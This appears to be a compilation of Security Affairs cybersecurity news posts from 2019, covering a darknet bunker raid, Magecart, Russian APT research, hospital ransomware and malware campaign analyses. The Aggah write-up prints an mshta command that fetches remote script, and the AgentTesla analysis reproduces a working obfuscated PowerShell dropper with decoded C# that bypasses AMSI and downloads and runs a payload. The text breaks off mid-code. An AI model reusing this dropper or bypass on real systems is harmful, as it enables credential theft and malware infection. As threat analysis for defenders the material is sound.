“Thursday’s raids involved hundreds of officers and came after years of following up on leads in cooperation with other agencies. Police believe that the data center was involved in a hack attack three years ago on the national communications provider, Telekom.” reported the DW agency.

“Officials said the server seized on Thursday had also hosted the second-largest darknet trading platform, Wall Street Market.  Authorities in the European Union and the US shut that platform down in May, claiming it was used to traffick stolen data, forged documents, computer malware and illicit drugs.”

According to prosecutors, the criminal ring behind the illegal network was composed at least thirteen members, 12 men and one woman, aged from 20 to 59. The suspects ran the powerful servers inside the former NATO bunker in the town of Traben-Trarbach in Rhineland-Palatinate state.

The operation involved hundred police agents in Germany and other European countries, they seized 200 servers, numerous data carriers and mobile phones and a large sum of cash.

The police also confirmed that the popular “Wall Street Market” black marketplace was hosted on the seized server. In May, the German police, with the support of Europol, Dutch police and the FBI, has shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German nation suspects were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also allowed to arrest of two major suppliers of illegal narcotics in the United States.

Prosecutors also revealed that the same cyber bunker was used to host the C2 behind a botnet involved in a massive attack that hit the German provider Deutsche Telekom in November 2016.

Pierluigi Paganini

(SecurityAffairs – darknet, hacking)

The post German police arrest suspects in raid network hosting Darknet marketplaces appeared first on Security Affairs.

Magecart 5 hacker group targets L7 Routers

IBM researchers observed one of the Magecart groups using a malicious code to inject into commercial-grade layer 7 L7 routers.

IBM X-Force Incident Response and Intelligence Services (IRIS) experts observed that one of the Magecart groups, tracked as MG5, is using malware to inject into commercial-grade L7 routers.

The experts believe the hackers are likely testing malicious code designed for injection into benign JavaScript files loaded by L7 routers that are typically used by airports, casinos, hotels, and resorts. According to IBM, the threat actors are currently targeting users shopping on U.S. and Chinese websites.

The experts discovered that the Magecart hackers are able to inject credit card skimmer into a popular open-source JavaScript library that websites use to ensure wide compatibility with mobile browsing.

we found that MG5 has likely devised an attack scenario in which it could inject its malicious payment card stealing code into a popular open-source JavaScript library. This open-source code is provided as a free, licensed tool designed to help make websites compatible with mobile browsing.” reads the analysis published by IBM.”By infecting that code, MG5 can potentially infect and compromise the data of mobile device users that install booby-trapped apps and then shop online.”

The experts speculate the attackers have prepared code for injection into a specific type of commercial-class L7 router, they pointed out that no vendor compromise has been observed so far.

L7 routers implement both routing and switching capabilities, an attacker that compromises the network devices could potentially perform several malicious activities, such as traffic hijacking.

The router can be installed in the same virtualization server as other business-critical IT infrastructure components, this means that once compromised could be used by hackers for lateral movements.

The Wi-Fi connectivity is usually offered for free in locations such as hotels that prefer to outsource the Wi-Fi service, but most vendors for Wi-Fi service do not support proxying adverts or JavaScript injection.

“Having access to a large number of captive users with very high turnover — such as in the case of airports and hotels — is a lucrative concept for attackers looking to compromise payment data.”continues IBM. “We believe that MG5 aims to find and infect L7 router libraries with malicious code and possibly inject malicious ads that captive users must click on to eventually connect to the internet.”

Attackers can compromise L7 routers to steal guest payment data from the users the browse websites through the compromised network device, they can also inject malicious ads into webpages viewed by all connected guest devices.

IBM experts also believe that the Magecart hackers have infected open-source mobile app code that’s offered to app developers for free.

“Another finding from X-Force IRIS with regards to code being tested by Magecart Group 5 concerns open-source mobile app code that’s offered to app developers for free. The code provides a library-agnostic touch slider to allow developers to build touch galleries for their app projects.” concludes the report.

“MG5 has likely infected this code, corrupting it as its source to ensure that every developer using the slider will end up serving the attackers’ malicious code, leading to the compromise of data belonging to those using the finished product,”.

The report also includes mitigation tips to prevent access to data.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Magecart 5 hacker group targets L7 Routers appeared first on Security Affairs.

Study shows connections between 2000 malware samples used by Russian APT groups

A joint research from Intezer and Check Point Research shows connections between nearly 2,000 malware samples developed by Russian APT groups.

A joint research from Intezer and Check Point Research shed light on Russian hacking ecosystem and reveals connections between nearly 2,000 malware samples developed by Russian APT groups.

The report is extremely interesting because gives to the analysts an overview of the Russian hacking community and their operations.

The experts also published an interactive map that gives a full overview of this Russian hacking ecosystem.

Since the first publicly known attacks by Moonlight Maze, in 1996, many Russian hacking groups have emerged in the threat landscape, their operations involved highly sophisticated malware and hacking techniques.

“Russia is known to conduct a wide range of cyber espionage and sabotage operations for the last three decades. Beginning with the first publicly known attacks by Moonlight Maze, in 1996, the Pentagon breach in 2008, Blacking out Kyiv in 2016, hacking the United States elections in 2016, and including some of the largest, most infamous cyberattacks in history, targeting an entire nation with NotPetya ransomware.” states the report.

“This led us to gather, classify, and analyze thousands of Russian APT malware samples in order to find connections not only between samples, but also between different families and actors.”

Russian APT Map

The Russian hacking ecosystem characterized by Russian APT groups is very complex, security firms have collected a huge quantity of information related to single threat actors, but not of them provided a global picture of the ecosystem.

Give a look at the “Russian APT Map,” that illustrates the connections between different Russian APT malware samples, malware families, and threat actors.

Russian APT MAP

Experts analyzed approximately 2,000 samples that were attributed to Russian APT groups, the researchers found 22,000 connections between the samples, in addition to 3.85 million non-unique pieces of code that were shared. The study classified the samples into 60 families and 200 different modules.

“Every actor or organization under the Russain APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks. Knowing that a lot of these toolkits serve the same purpose, it is possible to spot redundancy in this parallel activity.” continues the report.

“These findings may suggest that Russia is investing a lot of effort into its operational security. By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations.”

Experts also released a signature-based tool to scan dubbed Russian APT Detector a host or a file against the most commonly re-used pieces of code used by the Russian APT groups in their operations.

Enjoy the report!

Pierluigi Paganini

(SecurityAffairs – Russian APT, hacking)

The post Study shows connections between 2000 malware samples used by Russian APT groups appeared first on Security Affairs.

APT or not APT? What’s Behind the Aggah Campaign

Researchers at Yoroi-Cybaze ZLab discovered an interesting drop chain associated with the well-known Aggah campaign.


During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and infrastructures, for instance in “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports. 

But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities.

Technical Analysis

ThreatExcel document Dropper
Brief DescriptionFirst stage of Aggah campaign

Table 1. Sample’s information

As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:

mshta.exe http://bit[.ly/8hsshjahassahsh

The link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html.This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.

Figure 1. HTA script hidden into Blogspot page
Figure 2. Deobfuscated HTA script

This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.

Figure 3. Another obfuscated Javascript snippet

In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:

  • the creation of a new task called “Windows Update” that triggers every 60 minutes; 
  • the creation of another task called “Update” that triggers every 300 minutes;
  • the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate” registry key;

Each entry contact to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes.

Figure 4. Code used to set persistence

During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin. 

Figure 5. Deobfuscation process
Figure 6. Powershell script used to inject the final payload in legit process

The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage. 

The AzoRult Payload

Brief DescriptionAzoRult final payload

Table 3. Sample’s information

This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data.

Figure 7. AzoRult tries to extract info from browsers files

Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain. 

Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2


We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples.

The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog

Pierluigi Paganini

(SecurityAffairs – Aggah campaign, hacking)

The post APT or not APT? What’s Behind the Aggah Campaign appeared first on Security Affairs.

Campbell County Memorial Hospital in Wyoming hit by ransomware attack

Campbell County Memorial Hospital in Gilette, Wyoming is facing service disruptions after a ransomware attack hit its computer systems on Friday.

On Friday, the Campbell County Memorial Hospital in Gilette, Wyoming, suffered a ransomware attack that is still causing service disruptions.

“Campbell County Health has been the victim of a ransomware attack. All CCH computer systems have been affected, which impacts the organization’s ability to provide patient care,” reads a statement published by the Campbell County Health.

All updates are available at: Public Update 9/22/19, 2:30 pm: Campbell County Health continues to…

Gepostet von Campbell County Health am Freitag, 20. September 2019

The ransomware attack is having a dramatic impact con the operations at the hospital, the staff has canceled some surgeries, as well as respiratory therapy and radiology exams and procedures. The hospital has temporarily halted new inpatient admissions.

“Campbell County Health continues to have service disruptions, however, the Emergency Medical Services (EMS), the Emergency Department, Maternal Child (OB) and the Walk-in Clinic are open to assess patients and treat or transfer patients as appropriate.” reads an update published by the hospital. “It is advised to call to confirm your appointment prior to going in. All patients are also asked to bring medication bottles with them to their appointment.”

Immediately after the discovery of the attack, the hospital announced that that the patients presenting to the emergency department and walk-in clinic would be assessed and transferred to an appropriate care facility if needed.

“We are working with regional facilities to transfer patients to if we are not able to provide safe care. The Emergency Department is open and staffed with our expert team of physicians and nursing to assess and evaluate patient care needs,” announced the Campbell County Health.

According to the management at the Campbell County Health hospital, patient and employee data was not accessed in the ransomware attack.

The organization reported the incident to the authorities that still investigating the security breach.

“At this point in time, there is no evidence that any patient data has been accessed or misused. The investigation is ongoing, and we will provide updates when more information becomes available. We are working diligently to restore complete access to our services,” Campbell County Health added.

As on Sunday, the majority of the services at the hospital was restored, however, patients are invited to call in advance to confirm their appointments.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – Campbell County Memorial Hospital, hacking)

The post Campbell County Memorial Hospital in Wyoming hit by ransomware attack appeared first on Security Affairs.

Portugues hacker faces hundreds of Charges in Football Leaks case

An alleged Portuguese hacker faces 154 charges connected with the publication of internal documents in the Football Leaks case.

An alleged Portuguese hacker, Rui Pinto, faces 154 charges connected with the publication of internal documents of top European clubs and soccer officials in the Football Leaks case.

The attorney general’s office confirmed last week that Rui Pinto, who is in custody in Lisbon after being extradited from Hungary, is accused of numerous alleged crimes connected to the leak of sensitive financial document financial of Top European clubs.

Rui Pinto, 30, was arrested in January in Hungary following a warrant issued by the Portuguese authorities.

At the time of the arrest, Pinto’s lawyers described him as “a young Portuguese man who loves football and who, out of disgust at practices that he gradually became aware of, decided to reveal to the world the extent of criminal practices which not only affect the football world but do grave damage to its image”.

Authorities accused Pinto of several crimes, including attempted extortion.

The alleged hacker published secret information about players’ and coaches’ contracts and transfer fees on the Football Leaks website.

The Football Leaks website was launched in 2015 and over the year published several confidential documents of the football sector.

“The statement says the Football Leaks website published confidential information about players’ and coaches’ contracts and transfer fees, among other things.” reported the AP News.

At the time of writing, authorities still haven’t fixed a trial date.

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post Portugues hacker faces hundreds of Charges in Football Leaks case appeared first on Security Affairs.

Security Affairs newsletter Round 232

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

A bug in Instagram exposed user accounts and phone numbers
Delaler Leads, a car dealer marketing firm exposed 198 Million records online
Drone attacks hit two Saudi Arabia Aramco oil plants
A flaw in LastPass password manager leaks credentials from previous site
Astaroth Trojan leverages Facebook and YouTube to avoid detection
Data leak exposes sensitive data of all Ecuador ‘citizens
France and Germany will block Facebooks Libra cryptocurrency
MobiHok RAT, a new Android malware based on old SpyNote RAT
Tor Projects Bug Smash Fund raises $86K in August
Australia is confident that China was behind attack on parliament, political parties
Backup files for Lion Air and parent airlines exposed and exchanged on forums
Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors
Experts warn of the exposure of thousands of Google Calendars online
Fraudulent purchases of digitals certificates through executive impersonation
Memory corruption flaw in AMD Radeon driver allows VM escape
More than 737 million medical radiological images found on open PACS servers
Skidmap Linux miner leverages kernel-mode rootkits to evade detection
United States government files civil lawsuit against Edward Snowden
At least 1,300 Harbor cloud registry installs open to attack
Emotet is back, it spreads reusing stolen email content
Smominru Botnet continues to rapidly spread worldwide
Commodity Malware Reborn: The AgentTesla Total Oil themed Campaign
Crooks hacked other celebrity Instagram accounts to push scams
Magecart attackers target mobile users of hotel chain booking websites
Two selfie Android adware apps with 1.5M+ downloads removed from Play Store
U.S. taxpayers hit by a phishing campaign delivering the Amadey bot
5 Cybersecurity Trends in the Professional Services Sector
Iran denies successful cyber attacks hit infrastructures of its oil sector
MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019)
One of the hackers behind EtherDelta hack also involved in TalkTalk hack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 232 appeared first on Security Affairs.

MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019)

Hello, it’s unixfreaxjp here. It has been a while since I wrote our own blog, and it is good to be back. Thank you for your patience for all of this time.

The background

It was after September 2016 when we decided to move our blog and since then I had a lot of fun in learning and experimenting much with “Jekyll” (based on “Poole”) and “BlackDoc”, and I just convert all posts statically into “Markdown” and all syntax highlighter into “Rouge” highlighter with templates coded in “Liquid”, and I was seriously dealing with coding in Ruby on FreeBSD for it. Wasn’t easy, but with help from the team, we did that, and I learned a lot.

Then on posting my research I moved along to try out several platforms, it’s good to actually know that we don’t have to depend only into a platform, and 3 (three) years out there was making us learning a lot about other reliable services in here and there. What me and the mates have learned is, in using any media services, either it’s your own or other’s party ones, they all are having their pro’s and con’s points. And frankly speaking, you won’t know for sure about each one of those con’s unless you go out there and try them yourself.

So, here we are, back to service where we first started to do MalwareMustDie blog. And I found that this environment is nicer than before, thank you Google for doing the hard work in satisfying and securing bloggers. So I just set it up and switched all access to HTTPS and hopefully the dead-links effect are minimum. For those who had problem with broken RSS this effort may be a good news to you. You can still access the MMD (MalwareMustDie) blog under sub-domain of “blog2” with HTTP but I won’t add more posts on those servers and I will minimize its service.

The bad side of all of these adventure is, now I have my research materials scattering around all over the internet during these past three years (smile). Oh yes, the research and its activity is still active as usual, yet now we’re happy that we don’t need to make much voice anymore, the security awareness are blooming..not like we had before in 2012, I am still hanging out with our friends and we’re still on to dissecting malware.. Linux or not.. Intel CPU ones or not, and to be noted: I am still a great fan of radare2 and FreeBSD!

I think some followers may not know what we’ve been doing all of these three years, or maybe they can’t track well our activities on our security research, so I decided to list some links for you to catch up with. Some of those reports are just screenshots with comments (security related pictures really paint thousand words), some are just posts in reddit or others, but all contains important information.
Does this means I am posting analysis blog again? Well, you’re going to find that out too 🙂

Here’s the list of what’s been done during these three years, enjoy:

1. Windows related malware posts

Raccoon stealer infection in the wild

Dissecting on memory post exploitation powershell beacon w/ radare2

Intel POPSS Vulnerability PoC Reversed




“FHAPPI attack” : FreeHosting APT PowerSploit Poison Ivy

2. Linux related malware posts

Honda Car’s Panel’s Rootkit from China




Linux/DDoSTF today

GoARM.Bot + static strip ARM ELF by ChinaZ

Linux/ChinaZ Edition 2


Linux/Haiduc (bruter/memo)






Linux/Mandibule (Process Injector)

So Many Mirai..Mirai on the wall)

Today’s Kaiten and PerlDDoS

Linux/STD bot

Linux/Kaiten (modded ver) in Google clouds

Linux/Qbot or GafGyt Kansas city?

ChinaZ gang is back to shellshock drops Elknot abuses USA networks

3. Mac OSX related malware posts


OSX/MachO-PUP (a quickie)

4. Other malware reports

Webshell/r57shell, and..

I also posted either in VirusTotal comments, or previously posted some on kernelmode(not anymore), or sometimes making several posts or notes in reddit.

5. My talks on security conference

About my presentation of: “Unpacking the non-unpackable” (ELF packers talk) in R2CON2018


I may edit/change my posts to adjust or brush up their contents along with this post on transitioning the services, so there will be addition or changes.

Please stay safe, don’t code/use bad stuff, and enjoy the summary!


Original Post:

Pierluigi Paganini

(SecurityAffairs – MalwareMustDie, malware)

The post MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019) appeared first on Security Affairs.

One of the hackers behind EtherDelta hack also involved in TalkTalk hack

US authorities have indicted two men for hacking the exchange EtherDelta in December 2017, one of them was also accused of TalkTalk hack.

US authorities have indicted two men, Elliot Gunton and Anthony Tyler Nashatka, for hacking the cryptocurrency exchange EtherDelta in 2017.

In December 2017, the popular cryptocurrency exchange EtherDelta was hacked, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789 at the time of the hack) as well as a large number of tokens.

According to ZDNet, one of the suspects, the Briton Elliott Gunton(20) aka “Glubz, was also accused of TalkTalk hack.

The other suspect is Anthony Tyler Nashatka, aka “psycho,” from New York city. The duo hacked the EtherDelta systems using employee data (phone number, email address) purchased on the black market.

“The two, over the course of just a week, went from buying an EtherDelta’s employee phone number off the black market to stealing funds from thousands of EtherDelta users.” reported ZDNet.

Court documents obtained by ZDNet in exclusive refer the employee was Z.C., experts believe he is the EtherDelta’s CEO. Clearly the access to the CEO account allowed the hacker to breach the company.

The employee’s data were acquired by Nashatka that asked Gunton to help him in hijacking both EtherDelta’s Cloudflare and Dreamhost accounts.

Six days later, on December 19, 2017. Gunton tricked a mobile telco’s operator into adding a call forwarding number to Coburn’s mobile account.

In this way, any incoming calls were silently forwarded to a Google Voice number operated by the two hackers including two-factor authentication (2FA) messages for the EtherDelta account.

On December 20, the two hackers modified DNS settings in the G Suite portal of EtherDelta and redirected Gmail traffic through a server under their control allowing them to reset the password on EtherDelta’s Cloudflare account. Once gained the access the Cloudflare account they were able to lock out any other employee of the company.

At this point, the duo changed EtherDelta’s DNS records associating the EtherDelta domain to a server under their control that was hosting a copy of the legitimate site used to trick victims into providing their credentials.

The DNS redirection was discovered in a few hours, but it was enough for the hackers to steal more than $800,000 from the accounts of the EtherDelta users.

According to ZDNet, the indictment was filed on August 13, in San Francisco, a few days before Gunton was sentenced to 20 months in prison in the UK. He was also ordered to pay back £407,359 and given a three-and-a-half-year community order, which restricts his internet and software use.

Pierluigi Paganini

(SecurityAffairs – TalkTalk, hacking)

The post One of the hackers behind EtherDelta hack also involved in TalkTalk hack appeared first on Security Affairs.

U.S. taxpayers hit by a phishing campaign delivering the Amadey bot

Cofense researchers spotted a phishing campaign that is targeting taxpayers in the United States to infect them with the Amadey malware.

Security experts at Cofense uncovered a phishing campaign that is targeting taxpayers in the United States attempting to infect them with a new piece of malware named Amadey.

The Amadey bot is a quite simple piece of malware that is available for hire for cybercriminals. Experts revealed that the botnet was used by the TA505 cybercrime gang to distribute the FlawedAmmy RAT and some email stealers.

“The Cofense Phishing Defense CenterTM  has detected a new wave of attacks targeting the US taxpayer by delivering Amadey botnet via phishing emails.” reads the analysis published by Cofense. “Amadey is a relatively new botnet, first noted late in Q1 of 2019. Known for its simplicity, it is available to hire for a very steep price compared to other commercially available botnets with similar functionality.”

The phishing messages used in this campaign purport to be from the Internal Revenue Service (IRS), they claim that the recipient is eligible for a tax refund.

Amadey IRS phishing

In classic social engineering attack, the phishing message presents a “one time username and password” to the victims and urges the user to click the “Login Right Here” button.

The login button is an embedded Hyperlink that points to hxxp://yosemitemanagement[.]com/fonts/page5/, a page designed to display a fake IRS login page.

Once provided the login credentials, the user will be informed of a pending refund and will be asked to download a document, print and sign it. The signed document has to be sent or uploaded to the portal. Experts discovered that when the user attempts to download the document, he will download a ZIP file that contains a highly obfuscated script dropper written in Visual Basic.

The VBScript drops an executable that downloads and executes another executable. To Amadey malware achieves persistence by setting up a registry entry using the Reg.exe command-line tool.

Once the installation process is concluded, the Amedey bot connects to one of the command and control (C&C) servers via HTTP on port 80 and sends it system diagnostic information, then it waits for further instructions.

The Amedey malware sends back to the server several data, including a unique identifier of the infected system, the malware version, operating system, antivirus software, system name, and username.

The analysis published by Cofense includes the Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post U.S. taxpayers hit by a phishing campaign delivering the Amadey bot appeared first on Security Affairs.

Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Agent Tesla is a fully customizable password info-stealer offered as malware-as-a-service, many cyber criminals are choosing it as their preferred recognition tool.  


Nowadays the Malware-As-A-Service is one of the criminal favorite ways to breach security perimeter. Agent Tesla is one of these “commodity malware”. It is a fully customizable password info-stealer and many cyber criminals are choosing it as their preferred recognition tool.  

During our monitoring operations we discovered an infection-chain designed to deliver this kind of malware to some Italian companies. The attack has been carried out impersonating personnel from the Liberian division of a global Oil Corporate. The malicious email message were spoofed, but the reference to the employee was realistic and suggests he may have conducted some preliminary OSINT.

Technical Analysis

ThreatMacro Dropper
Brief DescriptionAgent Tesla Doc Macro Dropper

Table 1. Static information about the doc macro

The document uses a common phishing schema, it invites the user to enable the macro execution due to compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document
Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacement the document spawns another Powershell script.

  1. powershell -WindowStyle Hidden
  2. function b72f3 { param($l74b5) $l557ad = ‘bc9b4’;$l63acc = ”; for ($i = 0; $i -lt $l74b5.length; $i+=2) { $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16); $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]); } return $l63acc;}
  3. $k61b35e = ‘1710500c534230401140070e0217470b0d5e42671b104d07594c314c0c400b0e5c4c7d0c175c105b12305c10420b005c110f1710500c534230401140070e17265d0304570d47160a5a110f1710500c534230401140070e172b7b59164a0b5a05436a1b471606544c7a0717026f3e12165b0e5d01435a0e55111019120d5b020a045619387d0e582b0e490d46164b1b0951100d5c0e07504115275a161140325b0b0d4d5f1625064d32460d0078065010064a11164b3e191241000f500114111758165d01435c1a40071157427d0c1769164642155856020354112b5a16334d101403050d55000056151140100a57051403510d57034b586226580e2a54125b101711405f071157075851511b4e14270d4d104d320c500c40425e1940780d025d2e5d001158104d404a6442441701550b5742104d03400b0019074c16064b0c142b0d4d324010434c06055656084a471611500c5342090d0600005610596f260f552b59120c4b161c40085c105a070f0a50164e437c0c40101a690d5d0c170440620b114d17550e334b0d4007004d401d3f434917560e0a5a424716024d0b574206411651100d19005b0d0f190f0d5b5b0b010c4a2a571664161119115204050157004e36700c4032174b425e57510a54554e434c0b5a16434b5606550215425b171719175d0c17190f0c035a0d4b0f3927550e7d0f135610404a417207460c065551064c07550e164e437c0c40101a690d5d0c17044066160f740d42072e5c0f5b101a1b4e1431064d2e5511177c10460d110404550e105c4b6942104d03400b0019074c16064b0c14140c50061408005f0006504b700c4032174b425904525b5a182b0d4d324010435d015506520c4e5d0c1719090057555b4b0f12165b0e5d01434a1655160a5a425d0c17190d0c53050f551c4b18700c4032174b425107050b5703425e19175053570c531c00540b04074a410951040757585256530209540404560c401d4b5850041c07065f5001555e042b5a16334d101a38064b0d1d190456165b420f0b57010158442b5a16334d10140000585455035e4f030054020e4a5107050b57034e010e5052514b1b500752060d030400550e520552510c5506525708520052560c01055241104b0f0b0511005703555803095f2a5716641611173851100c1019530d1756425850560c010f1f36700c4032174b425007555f51094a36700c4032174b4b015916500c4042070c0102535e09595d044b180f0d5b5b0b010c4a015a0302030215065154050a4e041a57094e5b17171906010155084b1d190456165b420f0b5701015844204d1606623f140752005552005b0419041a50084e041a055f4e041a5a091f0f2b0d4d32401043520751515a585f7903114a0a550e4d780e580d007125580d01580e1c514a022f5510105103584c2056124d4a06085b030401014e044e085c07075b0215511d59095a04565051110c511543700c4032174b4a5601020f03554c37562b5a16550d4a1d49534152045301104e5f07060a5b554e5010595850560c010e42345c00770e0a5c0c4042115d53075a5a040c5115436e0756210f50075a164b1059471611500c53421a5b0755555a04275a140a4b0d5a0f0657161a25064d245b0e075c10640317514a710c1550105b0c0e5c0c404c304907570b0255245b0e075c101a2313490e5d01024d0b5b0c275816554b481b3e681a50585a05034112000350050a4a16560009540053530e401d59115d53075a5a17265b150d550d550625500e514a010e5052514b1b525553540d060550535c565056000d070557570a565752010c5a04015609530453550d0304035258520552000c560006570a530656060c0304065658530252550c550554525b530652050d010457565d5257535308540451565f525653530c5604555709565053560c520455570a530556000e060555570f500152010c5a0404550d5250535008550455575a5203404a151b5607020e5b1d59334b0d5707104a314003114d2b5a040c190c0150005c04515f0d5c1514321156015111106a16551017700c520d4b4000510354004b0f3211560151111017314003114d4a5a57515a0752074a02105116164b0c145258441241000f500114111758165d01434a16460b0d5e425655515f511c11174b0b5a05434a53525557584b4f11174b0b5a054358040055575b570940015a5b565641021140100a5705141707085601535e6a16460b0d5e4c710f134d1b0f040c4b4a5d0c17190b095258505e4753050e56554c2f5c0c53160b020b1f5f511019561b175c424203570f03035f20560c4207114d4c600d214016514a10080403560217314100104d105d0c04110b18504a1553024b584c060556560849094a005103464b4b4f030054020e426a42025f560356010c391c0b4c0b4b14474358040055575b571a2e065705400a3e10594910064d17460c434c060556560859491f’;$k61b35e2 = b72f3($k61b35e);
  4. Add-Type -TypeDefinition $k61b35e2;[p99a3fb]::o81f67();

Code Snippet 1

The Powershell stage is substantially composed of three parts: the first is the declaration of  function “b72f3()”, having the purpose to deobfuscate the second part of the script, contained into the “$k61b35e” variable. It actually is a C# source code snippet, compiled and loaded within the Powershell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just compiled “p99a3fb” class.

  1. using System;
  2. using System.Runtime.InteropServices;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Net;
  6. public class p99a3fb{
  7. [DllImport(“kernel32″,EntryPoint=”GetProcAddress”)]
  8. public static extern IntPtr va46a7(IntPtr af474b5,string a2457);
  9. [DllImport(“kernel32”, EntryPoint = “LoadLibrary”)] public static extern IntPtr ud1451(string j4d4b5);
  10. [DllImport(“kernel32″, EntryPoint=”VirtualProtect”)] public static extern bool m9982c8(IntPtr sfff854,UIntPtr j5236a, uint r427a, out uint m8a94);
  11. [DllImport(“Kernel32.dll”, EntryPoint=”RtlMoveMemory”, SetLastError=false)] static extern void jcfb22(IntPtr mf1b8,IntPtr dcad15,int k456b);
  12. public static int o81f67(){
  13. IntPtr eef257 = ud1451(b72f3(“030e4a0b1a060f55”));
  14. if(eef257==IntPtr.Zero){goto l255c;}
  15. IntPtr bca6aa=va46a7(eef257,b72f3(“230e4a0b67010257204104055c10”));
  16. if(bca6aa==IntPtr.Zero){goto l255c;}
  17. UIntPtr de6f3=(UIntPtr)5;
  18. uint d5c61=0;
  19. if(!m9982c8(bca6aa,de6f3,0x40,out d5c61)){goto l255c;}
  20. Byte[] e197fb8={0x31,0xff,0x90};
  21. IntPtr kee39a=Marshal.AllocHGlobal(3);
  22. Marshal.Copy(e197fb8,0,kee39a,3);
  23. jcfb22(new IntPtr(bca6aa.ToInt64()+0x001b),kee39a,3);
  24. l255c: WebClient rd1389=new WebClient();
  25. string ybea79=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+”\\x3a81a”+b72f3(“4c064107”);
  26. rd1389.DownloadFile(b72f3(“0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07”),ybea79);
  27. ProcessStartInfo n52cefe=new ProcessStartInfo(ybea79);
  28. Process.Start(n52cefe);
  29. return 0;
  30. }
  31. public static string b72f3(string s1f74a){
  32. string af474b5=”bc9b4″;
  33. string ud1451=String.Empty;
  34. for(int i=0;
  35. i<s1f74a.Length;
  36. i+=2){
  37. byte va46a7=Convert.ToByte(s1f74a.Substring(i,2),16);
